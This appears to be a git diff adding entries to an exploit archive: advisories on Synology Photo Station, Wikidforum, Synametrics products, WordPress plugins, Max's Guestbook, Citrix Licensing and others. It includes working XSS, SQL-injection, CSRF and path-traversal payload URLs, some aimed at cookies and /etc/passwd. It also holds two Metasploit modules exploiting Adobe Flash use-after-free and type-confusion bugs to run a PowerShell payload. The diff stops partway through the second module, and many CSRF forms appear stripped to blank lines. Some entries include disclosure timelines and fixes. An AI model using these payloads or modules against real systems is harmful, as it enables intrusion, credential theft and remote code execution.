-0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/52416/info + +Synology Photo Station is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Photo Station 5 DSM 3.2 (1955) is vulnerable; other versions may also be affected. + +http://www.example.com/photo/photo_one.php?name=494d475f32303131303730395f3232343432362e6a7067&dir=6970686f6e65207068696c69707065&name=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%38%38%2c%38%33%2c%38%33%29%29%3c%2f%73%63%72%69%70%74%3e + +http://www.example.com/photo/photo_one.php?name=494d475f32303131303730395f3232343432362e6a7067&dir=6970686f6e65207068696c69707065&name=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3c%2f%73%63%72%69%70%74%3e%3c%61%20%68%72%65%66%3d%22 \ No newline at end of file diff --git a/platforms/php/webapps/36946.txt b/platforms/php/webapps/36946.txt new file mode 100755 index 000000000..3425c5c92 --- /dev/null +++ b/platforms/php/webapps/36946.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/52425/info + +Wikidforum is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Wikidforum 2.10 is vulnerable; other versions may also be affected. + + +Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> [sql-injection] +Search-Field -> Advanced Search -> POST-Parameter 'opt_search_select' -> [sql-injection] \ No newline at end of file diff --git a/platforms/php/webapps/36947.txt b/platforms/php/webapps/36947.txt new file mode 100755 index 000000000..d99cc9776 --- /dev/null +++ b/platforms/php/webapps/36947.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52425/info + +Wikidforum is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Wikidforum 2.10 is vulnerable; other versions may also be affected. + +Search-Field -> '" \ No newline at end of file diff --git a/platforms/php/webapps/36948.txt b/platforms/php/webapps/36948.txt new file mode 100755 index 000000000..127564b23 --- /dev/null +++ b/platforms/php/webapps/36948.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/52425/info + +Wikidforum is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Wikidforum 2.10 is vulnerable; other versions may also be affected. + +Search-Field -> Advanced Search -> Author -> '" +Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> > \ No newline at end of file diff --git a/platforms/php/webapps/36949.txt b/platforms/php/webapps/36949.txt new file mode 100755 index 000000000..f8c0daca6 --- /dev/null +++ b/platforms/php/webapps/36949.txt @@ -0,0 +1,61 @@ +# Exploit Title: Multiple vulnerabilities in Xeams 4.5 Build 5755 (CSRF/Stored XSS) +# Date: 07-05-2015 +# Exploit Author: Marlow Tannhauser +# Contact: marlowtannhauser@gmail.com +# Vendor Homepage: http://www.synametrics.com +# Software Link: http://web.synametrics.com/XeamsDownload.htm +# Version: 4.5 Build 5755. Earlier versions may also be affected. +# CVE: 2015-3141 (Xeams) +# Category: Web apps + + +# DISCLOSURE TIMELINE # +08/02/2015: Initial disclosure to vendor and CERT +09/02/2015: Acknowledgment of vulnerabilities from vendor +11/02/2015: Disclosure deadline of 01/03/2015 agreed with vendor +19/02/2015: Disclosure deadline renegotiated to 01/04/2015 at vendor's request +09/04/2015: Disclosure deadline renegotiated to 20/04/2015 at vendor's request +20/04/2015: Confirmation of fix from vendor +07/05/2015: Disclosure + +Note that the CVE-ID is for the CSRF vulnerability only. No CVE-ID has been generated for the stored XSS vulnerabilities. The vulnerable version of the product is no longer available for download from the vendor's webpage. Note also that this is a different vulnerability from CVE 2012-2569. + + +# EXPLOIT DESCRIPTION # +Xeams 4.5 Build 5755 is vulnerable to CSRF attacks, which can also be combined with stored XSS attacks (authenticated administrators only). The JSESSIONID created when a user logs on to the system is persistent and does not change across requests. + + +# POC 1 # +The following PoC uses the CSRF vulnerability to create a new SMTP domain in the application, and combines it with one of the stored XSS vulnerabilities. + + + + + + +# POC 2 # +The following PoC uses the CSRF vulnerability to create a new user with the details shown. + + + + + + +# STORED XSS VULNERABILITIES # +Stored XSS vulnerabilities are present in the following fields: + +Server Configuration > SMTP Configuration > Domain Configuration > New domain name field +Example URL: http://192.168.0.8:5272/FrontController?domainname=%3Cscript%3Ealert%28%22ONE%22%29%3C%2Fscript%3E&operation=160#tab2 + +Server Configuration > Manage Forwarders > Add a new forwarder > Recipient's address +Example URL: http://192.168.0.8:5272/FrontController?txtRecipient=%3Cscript%3Ealert%28%22THREE%22%29%3C%2Fscript%3E&txtIPAddress=127.0.0.1&chkGoodOnly=on&operation=130 + +Server Configuration > Manage POP3 Fetcher > New Account > POP3 Server field, User Name field, and Recipient field +Example URL: http://192.168.0.8:5272/FrontController?popFetchServer=%3Cscript%3Ealert%28%22XSS1%22%29%3C%2Fscript%3E&popFetchUser=%3Cscript%3Ealert%28%22XSS2%22%29%3C%2Fscript%3E&popFetchPwd=password&popFetchRecipient=%3Cscript%3Ealert%28%22XSS3%22%29%3C%2Fscript%3E&popFetchCount=0&operation=73&index=-1 + +Server Configuration > Server Configuration > Advanced Configuration > Smtp HELO domain [XSS is displayed in Tools > About Xeams] +Example URL: POST request + + +# MITIGATION # +Upgrade to the latest build of Xeams, available from the link shown. \ No newline at end of file diff --git a/platforms/php/webapps/36950.txt b/platforms/php/webapps/36950.txt new file mode 100755 index 000000000..b829604ec --- /dev/null +++ b/platforms/php/webapps/36950.txt @@ -0,0 +1,55 @@ +# Exploit Title: Multiple vulnerabilities in Syncrify Server 3.6 Build 833 (CSRF/Stored XSS) +# Date: 07-05-2015 +# Exploit Author: Marlow Tannhauser +# Contact: marlowtannhauser@gmail.com +# Vendor Homepage: http://www.synametrics.com +# Software Link: http://web.synametrics.com/SyncrifyDownload.htm +# Version: 3.6 Build 833. Earlier versions may also be affected. +# CVE: 2015-3140 +# Category: Web apps + + +# DISCLOSURE TIMELINE # +08/02/2015: Initial disclosure to vendor and CERT +09/02/2015: Acknowledgment of vulnerabilities from vendor +11/02/2015: Disclosure deadline of 01/03/2015 agreed with vendor +19/02/2015: Disclosure deadline renegotiated to 01/04/2015 at vendor's request +09/04/2015: Disclosure deadline renegotiated to 20/04/2015 at vendor's request +20/04/2015: Confirmation of fix from vendor +07/05/2015: Disclosure + +Note that the CVE-ID is for the CSRF vulnerability only. No CVE-ID has been generated for the stored XSS vulnerabilities. The vulnerable version of the product is no longer available for download from the vendor's webpage. + + +# EXPLOIT DESCRIPTION # +Syncrify 3.6 Build 833 is vulnerable to CSRF attacks, which can also be combined with stored XSS attacks (authenticated administrators only). The JSESSIONID created when a user logs on to the system is persistent and does not change across requests. + + +# POC 1 # +The following PoC uses the CSRF vulnerability to change the SMTP settings in the application, and combines it with two of the stored XSS vulnerabilities. + + + + + + +# POC 2 # +The following PoC uses the CSRF vulnerability to change the administrator password. + + + + + + +# STORED XSS VULNERABILITIES # +Stored XSS vulnerabilities are present in the following fields: + +Manage Users > Add New User > User's Full Name [displayed in Reports > Backup report by user] +Example URL: http://192.168.0.8:5800/app?fullName=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&login=user%40user.com&password=password&numVersionsToKeep=0&diskQuota=-1&selectedPath=%2Fhome%2F&operation=manageUsers&st=addUser# + +Configuration > Email Configuration > Administrator's Email [displayed in Troubleshoot and Reports pages] +Example URL: http://192.168.0.8:5800/app?adminEmail=%3Cscript%3Ealert%28VICTIM%29%3C%2Fscript%3E&smtpServer=127.0.0.1&smtpPort=25&smtpUser=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&smtpPassword=admin&smtpSecurity=None&proceedButton=Save&operation=config&st=saveSmtp + + +# MITIGATION # +Upgrade to the latest build of Syncrify Server, available from the link shown. diff --git a/platforms/php/webapps/36951.txt b/platforms/php/webapps/36951.txt new file mode 100755 index 000000000..9b0b90495 --- /dev/null +++ b/platforms/php/webapps/36951.txt @@ -0,0 +1,75 @@ +# Exploit Title: Multiple vulnerabilities in SynaMan 3.4 Build 1436 (CSRF/Stored XSS) +# Date: 07-05-2015 +# Exploit Author: Marlow Tannhauser +# Contact: marlowtannhauser@gmail.com +# Vendor Homepage: http://www.synametrics.com +# Software Link: http://web.synametrics.com/SynaManDownload.htm +# Version: 3.4 Build 1436. Earlier versions may also be affected. +# CVE: 2015-3140 +# Category: Web apps + + +# DISCLOSURE TIMELINE # +08/02/2015: Initial disclosure to vendor and CERT +09/02/2015: Acknowledgment of vulnerabilities from vendor +11/02/2015: Disclosure deadline of 01/03/2015 agreed with vendor +19/02/2015: Disclosure deadline renegotiated to 01/04/2015 at vendor's request +09/04/2015: Disclosure deadline renegotiated to 20/04/2015 at vendor's request +20/04/2015: Confirmation of fix from vendor +07/05/2015: Disclosure + +Note that the CVE-ID is for the CSRF vulnerability only. No CVE-ID has been generated for the stored XSS vulnerabilities. The vulnerable version of the product is no longer available for download from the vendor's webpage. + + +# EXPLOIT DESCRIPTION # +SynaMan 3.4 Build 1436 is vulnerable to CSRF attacks, which can also be combined with stored XSS attacks (authenticated administrators only). The JSESSIONID created when a user logs on to the system is persistent and does not change across requests. + + +# POC 1 # +The following PoC uses the CSRF vulnerability together with one of the stored XSS vulnerabilities, to create a new shared folder in the application. + + + + + + +# POC 2 # +The following PoC uses the CSRF vulnerability to create a new user with the details shown. + + + +
+ + + + + + + +
+ + + + + +# STORED XSS VULNERABILITIES # +Stored XSS vulnerabilities are present in the following fields: + +Managing Shared Folders > Shared folder name field +Example URL: http://192.168.0.8:6060/app?sharedName=%3Cscript%3Ealert%28%22Hello1%22%29%3C%2Fscript%3E&selectedPath=C%3A\&publicRead=1&publicWrite=1&operation=mngFolders&st=addFolder + +Manage Users > Add a new user > User's name field and Email/Login field +Example URL: POST request + +Advanced Configuration > Partial Branding > Main heading field and Sub heading field +Affects all users on all pages, pre and post authentication +Example URL: POST request + +Discovery Wizard > Discovery Service Signup > One-Word name +Example URL: http://192.168.0.8:6060/app?oneword=%3Cscript%3Ealert%28%22Marlow%22%29%3C%2Fscript%3E&x=35&y=21&operation=discovery&st=checkAvailability + + +# MITIGATION # +Upgrade to the latest build of SynaMan, available from the link shown. \ No newline at end of file diff --git a/platforms/php/webapps/36953.txt b/platforms/php/webapps/36953.txt new file mode 100755 index 000000000..b60e9adf5 --- /dev/null +++ b/platforms/php/webapps/36953.txt @@ -0,0 +1,78 @@ +# Exploit Title: Multiple vulnerabilities in SynTail 1.5 Build 566 (CSRF/Stored XSS) +# Date: 07-05-2015 +# Exploit Author: Marlow Tannhauser +# Contact: marlowtannhauser@gmail.com +# Vendor Homepage: http://www.synametrics.com +# Software Link: http://web.synametrics.com/SynTailDownload.htm +# Version: 1.5 Build 566. Earlier versions may also be affected. +# CVE: 2015-3140 +# Category: Web apps + + +# DISCLOSURE TIMELINE # +08/02/2015: Initial disclosure to vendor and CERT +09/02/2015: Acknowledgment of vulnerabilities from vendor +11/02/2015: Disclosure deadline of 01/03/2015 agreed with vendor +19/02/2015: Disclosure deadline renegotiated to 01/04/2015 at vendor's request +09/04/2015: Disclosure deadline renegotiated to 20/04/2015 at vendor's request +20/04/2015: Confirmation of fix from vendor +07/05/2015: Disclosure + +Note that the CVE-ID is for the CSRF vulnerability only. No CVE-ID has been generated for the stored XSS vulnerabilities. The vulnerable version of the product is no longer available for download from the vendor's webpage. + + +# EXPLOIT DESCRIPTION # +SynTail 1.5 Build 566 is vulnerable to CSRF attacks, which can also be combined with stored XSS attacks (authenticated administrators only). The JSESSIONID created when a user logs on to the system is persistent and does not change across requests. + + +# POC 1 # +The following PoC uses the CSRF vulnerability to create a new file bundle, and combines it with one of the stored XSS vulnerabilities + + + +
+ /> + + + + +
+ + + + + +# POC 2 # +The following PoC uses the CSRF vulnerability to create a new user with the details shown + + + +
+ + + + + + +
+ + + + + +# STORED XSS VULNERABILITIES # +Stored XSS vulnerabilities are present in the following fields: + +Manage Users > Create a new user > Full name field and Email field +Example URL: POST request + +Manage file bundles > Create a new file bundle > Friendly name field and File path field +Example URL: POST request + + +# MITIGATION # +Upgrade to the latest build of SynTail, available from the link shown. \ No newline at end of file diff --git a/platforms/php/webapps/36954.txt b/platforms/php/webapps/36954.txt new file mode 100755 index 000000000..a7057a713 --- /dev/null +++ b/platforms/php/webapps/36954.txt @@ -0,0 +1,69 @@ +Homepage +https://wordpress.org/plugins/yet-another-related-posts-plugin/ +Affected Versions <= 4.2.4 Description 'Yet Another Related Posts Plugin' +options can be updated with no token/nonce protection which an attacker may +exploit via tricking website's administrator to enter a malformed page +which will change YARPP options, and since some options allow html the +attacker is able to inject malformed javascript code which can lead to *code +execution/administrator actions* when the injected code is triggered by an +admin user. +injected javascript code is triggered on any post page. Vulnerability Scope +XSS +RCE ( http://research.evex.pw/?vuln=14 ) Authorization Required None Proof +of Concept + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ +Fix No Fix Available at The Moment. Timeline Notified Vendor - No Reply +Notified Vendor Again- No Reply +Publish Disclosure + +@Evex_1337 +http://research.evex.pw/?vuln=15 \ No newline at end of file diff --git a/platforms/php/webapps/36958.txt b/platforms/php/webapps/36958.txt new file mode 100755 index 000000000..72b4de423 --- /dev/null +++ b/platforms/php/webapps/36958.txt @@ -0,0 +1,92 @@ +================================================================ +CSRF/Stored XSS Vulnerability in Ultimate profile Builder Plugin +================================================================ + + +. contents:: Table Of Content + +Overview +======== + +* Title :CSRF and Stored XSS Vulnerability in Ultimate Profile Builder Wordpress Plugin +* Author: Kaustubh G. Padwad +* Plugin Homepage: https://downloads.wordpress.org/plugin/ultimate-profile-builder.zip +* Severity: HIGH +* Version Affected: Version 2.3.3 and mostly prior to it +* Version Tested : Version 2.3.3 +* version patched: + +Description +=========== + +Vulnerable Parameter +-------------------- + +* Label +* CSS Class atribute + +About Vulnerability +------------------- +This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin's browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. + +Vulnerability Class +=================== +Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) +Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) + +Steps to Reproduce: (POC) +========================= + +After installing the plugin + +1. Goto settings -> Ultimate profile Builder + +2. Insert this payload ## ## Into above mention Vulnerable parameter Save settings and see XSS in action + +3. Visit Ultimate Profile Builder settings page of this plugin anytime later and you can see the script executing as it is stored. + +Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below + +CSRF POC Code +============= + +* +* +*
+* +* +* " /> +* " /> +* " /> +* +* +* +* +* " /> +* +* +* +*
+* +* + +Mitigation +========== +No Update + +Change Log +========== +no Update + +Disclosure +========== +11-April-2015 Reported to Developer +No Update +credits +======= +* Kaustubh Padwad +* Information Security Researcher +* kingkaustubh (at) me (dot) com +* https://twitter.com/s3curityb3ast +* http://breakthesec.com +* https://www.linkedin.com/in/kaustubhpadwad \ No newline at end of file diff --git a/platforms/php/webapps/36959.txt b/platforms/php/webapps/36959.txt new file mode 100755 index 000000000..758788f12 --- /dev/null +++ b/platforms/php/webapps/36959.txt @@ -0,0 +1,84 @@ +================================================================ +CSRF/Stored XSS Vulnerability in ClickBank Ads V 1.7 Plugin +================================================================ + + +. contents:: Table Of Content + +Overview +======== + +* Title :CSRF and Stored XSS Vulnerability in ClickBank Ads Wordpress Plugin +* Author: Kaustubh G. Padwad +* Plugin Homepage: https://wordpress.org/plugins/clickbank-ads-clickbank-widget/ +* Severity: HIGH +* Version Affected: Version 1.7 and mostly prior to it +* Version Tested : Version 1.7 +* version patched: + +Description +=========== + +Vulnerable Parameter +-------------------- +* Title: + +About Vulnerability +------------------- +This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin's browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. + +Vulnerability Class +=================== +Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) +Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) + +Steps to Reproduce: (POC) +========================= + +After installing the plugin + +1. Goto Dashboard --> Setting --> ClickBank Ads --> Title + +2. Insert this payload ## "> ## Into above mention Vulnerable parameter Save settings and see XSS in action + +3. Visit Click Ads settings page of this plugin anytime later and you can see the script executing as it is stored. + +Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below + +CSRF POC Code +============= + + + +
+ >>" /> + + + + + + + + + + + + + + + + + +
+ + + + +credits +======= +* Kaustubh Padwad +* Information Security Researcher +* kingkaustubh (at) me (dot) com +* https://twitter.com/s3curityb3ast +* http://breakthesec.com +* https://www.linkedin.com/in/kaustubhpadwad \ No newline at end of file diff --git a/platforms/php/webapps/36961.txt b/platforms/php/webapps/36961.txt new file mode 100755 index 000000000..7ad660827 --- /dev/null +++ b/platforms/php/webapps/36961.txt @@ -0,0 +1,606 @@ +================================================================ +CSRF/Stored XSS Vulnerability in Ad Inserter Plugin +================================================================ + + +. contents:: Table Of Content + +Overview +======== + +* Title :CSRF and Stored XSS Vulnerability in Ad Inserter Wordpress Plugin +* Author: Kaustubh G. Padwad +* Plugin Homepage: https://wordpress.org/plugins/ad-inserter/ +* Severity: HIGH +* Version Affected: Version 1.5.2 and mostly prior to it +* Version Tested : Version 1.5.2 +* version patched: + +Description +=========== + +Vulnerable Parameter +-------------------- +* ad1_name +* Block 1 +* Block Name +* adinserter name +* disable adinserter + + +About Vulnerability +------------------- +This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin's browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. + +Vulnerability Class +=================== +Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) +Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) + +Steps to Reproduce: (POC) +========================= + +After installing the plugin + +1. Goto Dashboard --> Setting --> Ad Inserter --> Block1 + +2. Insert this payload ## "> ## Into above mention Vulnerable parameter Save settings and see XSS in action + +3. Visit Ad Inserter settings page of this plugin anytime later and you can see the script executing as it is stored. + +Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below + +CSRF POC Code +============= + + + +
+ + " /> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + +Mitigation +========== +Update to Latest version 1.5.3 + +Change Log +========== +https://wordpress.org/plugins/ad-inserter/changelog/ + +Disclosure +========== +18-April-2015 Reported to Developer +2-may-2015 Fixed By Developer +credits +======= +* Kaustubh Padwad +* Information Security Researcher +* kingkaustubh (at) me (dot) com +* https://twitter.com/s3curityb3ast +* http://breakthesec.com +* https://www.linkedin.com/in/kaustubhpadwad \ No newline at end of file diff --git a/platforms/php/webapps/36965.txt b/platforms/php/webapps/36965.txt new file mode 100755 index 000000000..4fbe5bae7 --- /dev/null +++ b/platforms/php/webapps/36965.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/52438/info + +Omnistar Live is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +SQL: + +http://www.example.com/support2/chat_request.php?only_dept=1%27 + +http://www.example.com/support/chat_request.php?only_dept=1%27 + +XSS: + +http://www.example.com/support2/chat_request.php?only_dept=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E \ No newline at end of file diff --git a/platforms/php/webapps/36967.txt b/platforms/php/webapps/36967.txt new file mode 100755 index 000000000..76f1d81e6 --- /dev/null +++ b/platforms/php/webapps/36967.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52471/info + +Max's Guestbook is prone to multiple remote vulnerabilities. + +Exploiting these issues could allow an attacker to execute arbitrary HTML and script code in the context of the affected browser, steal cookie-based authentication credentials, and execute arbitrary local scripts in the context of the webserver process. Other attacks are also possible. + +Max's Guestbook 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/max/index.php?page=../../../../../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/36968.txt b/platforms/php/webapps/36968.txt new file mode 100755 index 000000000..1e084759d --- /dev/null +++ b/platforms/php/webapps/36968.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/52474/info + +Max's PHP Photo Album is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker can exploit this vulnerability to view files and execute local scripts in the context of the webserver process. + +http//www.example.com/maximage/showImage.php?id=../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/36970.txt b/platforms/php/webapps/36970.txt new file mode 100755 index 000000000..ed2182e92 --- /dev/null +++ b/platforms/php/webapps/36970.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52528/info + +JPM Article Script 6 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +JPM Article Script 6 is vulnerable; other versions may also be affected. + +http://www.example.com/blog/index.php?page2=-1%27&cid=0 \ No newline at end of file diff --git a/platforms/windows/dos/36969.txt b/platforms/windows/dos/36969.txt new file mode 100755 index 000000000..2c056cf63 --- /dev/null +++ b/platforms/windows/dos/36969.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/52522/info + +Citrix Licensing is prone to a denial-of-service vulnerability. + +A remote attacker can leverage this issue to crash the affected application, denying service to legitimate users. + +Citrix Licensing 11.6.1 build 10007 is vulnerable; other versions may also be affected. + +Proof-of-Concept: +http://www.example.com/users?licenseTab=&selected=&userName=xsrf&firstName=xsrf&lastName=xsrf&password2=xsrf&confirm=xsrf&accountType=admin&originalAccountType=&Create=Save(Administrator CSRF) + +http://www.example.com/dashboard?=2 (pre auth DoS, crashes lmadmin.exe) + diff --git a/platforms/windows/remote/36956.rb b/platforms/windows/remote/36956.rb new file mode 100755 index 000000000..d76c94497 --- /dev/null +++ b/platforms/windows/remote/36956.rb @@ -0,0 +1,112 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Powershell + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Adobe Flash Player domainMemory ByteArray Use After Free', + 'Description' => %q{ + This module exploits a use-after-free vulnerability in Adobe Flash Player. The + vulnerability occurs when the ByteArray assigned to the current ApplicationDomain + is freed from an ActionScript worker, when forcing a reallocation by copying more + contents than the original capacity, but Flash forgets to update the domainMemory + pointer, leading to a use-after-free situation when the main worker references the + domainMemory again. This module has been tested successfully on Windows 7 SP1 + (32-bit), IE 8 and IE11 with Flash 17.0.0.134. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'bilou', # Vulnerability discovery according to Flash Advisory + 'Unknown', # Exploit in the wild + 'hdarwin', # @hdarwin89 / public exploit (msf module is based on this one) + 'juan vazquez' # msf module + ], + 'References' => + [ + ['CVE', '2015-0359'], + ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'], + ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html'], + ['URL', 'http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html'], + ['URL', 'https://git.hacklab.kr/snippets/13'], + ['URL', 'http://pastebin.com/Wj3NViUu'] + ], + 'Payload' => + { + 'DisableNops' => true + }, + 'Platform' => 'win', + 'BrowserRequirements' => + { + :source => /script|headers/i, + :os_name => OperatingSystems::Match::WINDOWS_7, + :ua_name => Msf::HttpClients::IE, + :flash => lambda { |ver| ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.134') }, + :arch => ARCH_X86 + }, + 'Targets' => + [ + [ 'Automatic', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Apr 14 2014', + 'DefaultTarget' => 0)) + end + + def exploit + @swf = create_swf + super + end + + def on_request_exploit(cli, request, target_info) + print_status("Request: #{request.uri}") + + if request.uri =~ /\.swf$/ + print_status('Sending SWF...') + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) + return + end + + print_status('Sending HTML...') + send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) + end + + def exploit_template(cli, target_info) + swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" + target_payload = get_payload(cli, target_info) + psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) + b64_payload = Rex::Text.encode_base64(psh_payload) + + html_template = %Q| + + + + + + + + + + + | + + return html_template, binding() + end + + def create_swf + path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0359', 'msf.swf') + swf = ::File.open(path, 'rb') { |f| swf = f.read } + + swf + end + +end \ No newline at end of file diff --git a/platforms/windows/remote/36962.rb b/platforms/windows/remote/36962.rb new file mode 100755 index 000000000..30e474a44 --- /dev/null +++ b/platforms/windows/remote/36962.rb @@ -0,0 +1,118 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Powershell + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Adobe Flash Player NetConnection Type Confusion', + 'Description' => %q{ + This module exploits a type confusion vulnerability in the NetConnection class on + Adobe Flash Player. When using a correct memory layout this vulnerability allows + to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like + vectors, and finally accomplish remote code execution. This module has been tested + successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 16.0.0.305. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Natalie Silvanovich', # Vulnerability discovery and Google Project Zero Exploit + 'Unknown', # Exploit in the wild + 'juan vazquez' # msf module + ], + 'References' => + [ + ['CVE', '2015-0336'], + ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-05.html'], + ['URL', 'http://googleprojectzero.blogspot.com/2015/04/a-tale-of-two-exploits.html'], + ['URL', 'http://malware.dontneedcoffee.com/2015/03/cve-2015-0336-flash-up-to-1600305-and.html'], + ['URL', 'https://www.fireeye.com/blog/threat-research/2015/03/cve-2015-0336_nuclea.html'], + ['URL', 'https://blog.malwarebytes.org/exploits-2/2015/03/nuclear-ek-leverages-recently-patched-flash-vulnerability/'] + ], + 'Payload' => + { + 'DisableNops' => true + }, + 'Platform' => 'win', + 'BrowserRequirements' => + { + :source => /script|headers/i, + :os_name => OperatingSystems::Match::WINDOWS_7, + :ua_name => Msf::HttpClients::IE, + :flash => lambda { |ver| ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.305') }, + :arch => ARCH_X86 + }, + 'Targets' => + [ + [ 'Automatic', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Mar 12 2015', + 